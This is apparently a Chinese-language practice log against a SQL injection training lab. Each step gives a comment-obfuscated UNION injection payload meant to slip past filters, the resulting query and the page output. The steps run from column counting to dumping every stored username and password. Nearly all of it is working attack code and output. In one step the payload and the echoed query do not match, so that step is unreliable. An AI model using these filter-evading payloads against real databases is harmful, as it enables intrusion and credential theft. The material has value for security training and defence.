payload:猜字段
' order /*//--/*/ by 3--+
sql语句:
SELECT * FROM users WHERE id='1' order /*//--/*/ by 3-- ' LIMIT 0,1
回显:
Your Login name:Dumb
Your Password:Dumb
payload:测回显
-1' union /*//--/*/ /*!--+*/%0aselect/*!1,2,3*/--+
sql语句:
SELECT * FROM users WHERE id='-1' union /*//--/*/ /*!-- */ select/*!1,2,3*/-- ' LIMIT 0,1
回显:
Your Login name:2
Your Password:3
payload:收集信息 当前用户
-1' union /*//--/*/ /*!--+*/%0aselect/*!1,*/user /*//--/*/(),3--+
sql语句:
SELECT * FROM users WHERE id='-1' union /*//--/*/ /*!-- */ select/*!1,*/user /*//--/*/(),3-- ' LIMIT 0,1
回显:
Your Login name:root@localhost
Your Password:3
payload:收集信息 当前数据库
-1' union /*//--/*/ /*!--+*/%0aselect/*!1,*/user /*//--/*/(),database/*//--+/*/ ()--+
sql语句:
SELECT * FROM users WHERE id='-1' union /*//--/*/ /*!-- */ select/*!1,*/user /*//--/*/(),database/*//-- /*/ ()-- ' LIMIT 0,1
回显:
Your Login name:root@localhost
Your Password:security
payload:暴所有库
-1' union /*!--+/*%0aselect/*!1,2,*/ group_concat(schema_name) /*!from*/ /*!--+/*%0ainformation_schema. /*!schemata*/ --+
sql语句:
SELECT * FROM users WHERE id='-1' union /*!-- /* select/*!1,2,*/ group_concat(schema_name) /*!from*/ /*!-- /* information_schema. /*!schemata*/ -- ' LIMIT 0,1
回显:
Your Login name:2
Your Password:information_schema,challenges,mysql,performance_schema,security
payload:暴所有表
-1' union /*!--+/*%0aselect/*!1,2,*/ group_concat(table_name) /*!from*/ /*!--+/*%0ainformation_schema. /*!tables*/ where table_schema='security' --+
sql语句:
SELECT * FROM users WHERE id='-1' union /*!-- /* select/*!1,2,*/ group_concat(table_name) /*!from*/ /*!-- /* information_schema. /*!tables*/ where table_schema='security' -- ' LIMIT 0,1
回显:
Your Login name:2
Your Password:emails,referers,uagents,users
payload:暴指定表下所有字段
-1' union /*!--+/*%0aselect/*!1,2,*/ group_concat(column_name) /*!from*/ /*!--+/*%0ainformation_schema. /*!columns*/ where table_name= 'users' --+
sql语句:
SELECT * FROM users WHERE id='-1' union /*!-- /* select/*!1,2,*/ group_concat(column_name) /*!from*/ /*!-- /* information_schema. /*!columns*/ where table_schema='security' -- ' LIMIT 0,1
回显:
Your Login name:2
Your Password:id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password
payload:暴数据
-1%27%20union%20/*!--+/*%0aselect/*!1,2,*/%20%20group_concat(concat_ws(0x7e,username,password))%20/*!from*/%20security.users--+
sql语句:
SELECT * FROM users WHERE id='-1' union /*!-- /* select/*!1,2,*/ group_concat(concat_ws(0x7e,username,password)) /*!from*/ security.users-- ' LIMIT 0,1
回显:
Your Password:
Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4